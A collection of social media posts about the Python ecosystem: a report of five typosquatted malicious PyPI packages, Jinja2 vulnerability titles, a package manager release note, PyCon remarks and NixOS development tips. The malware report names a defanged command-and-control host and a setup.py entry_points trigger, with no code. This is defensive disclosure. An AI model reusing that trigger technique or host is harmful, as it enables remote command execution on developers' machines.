Reported 5 malicious #Python packages to #PyPI: numberpy, tqmmd, pandans, openpyexl, reqwestss all by the same user leemay1782.
All with the same "functionality", getting commands via a socket from dzgi0h7on1jhzdg0vknw9pp9309rxjl8.oastify[.]com and executing it.
I don't think I saw the setup.py entry_points being used as a trigger mechanism before?
=== Begin ===
"Jinja2 sandbox escape via string formatting"
"Incorrect Privilege Assignment in Jinja2"
"Insecure Temporary File in Jinja2"
"Regular Expression Denial of Service (ReDoS) in Jinja2"
"Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"
"Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"
"High severity vulnerability that affects Jinja2"
=== End ===
The April 2024 release of Posit Package Manager brings support for air-gapped PyPI repositories, more flexible curated CRAN repositories, performance improvements and more!
Well, another #PyConUS is done (for me - #Sprints continue for another couple of days!)
It was excellent catching up with old friends and meeting tons of new ones. Pittsburgh was definitely a super cool vibe, 2025 should be fun too.
I'm looking forward to recharging my depleted physical batteries, so I can jump into all the important work we have ahead of us to continue to support this amazing community.
I think I have finally™️ (for the third or so time) found myself a solution for :python: #Python development on :nixos: #NixOS that allows me to just work with #pythonPoetry et. al. as on other distros.
The solution is to pre-build an FHSUserEnv in your configuration.nix, e.g. like this¹.
When starting Python dev work, I now execute fhs (it's fast!), or directly fhs -c 'poetry shell' and everything works as expected, including #PyPI wheels etc.
@docRekd@publicvoit Of course. It's not a general solution to be able to do Python dev on NixOS. One needs a separate nix file per project (that alone is an absolute no-go). Even if you take the time and try to make one, still no guarantee that it works (even with preferWheels=true!). Weird errors arise with nix' typical awful error messages and at this point it's not useable for general Python dev. Maybe for specific standalone Python projects you want to #nix-ify.
@lewiscowles1986 Yes, that's why I was suggesting it would be a nice filter, I think there are qualitative differences between large and tiny packages that could be different depending on the problem domain. At the moment, I have to read code of each package to filter. It is a slow way to search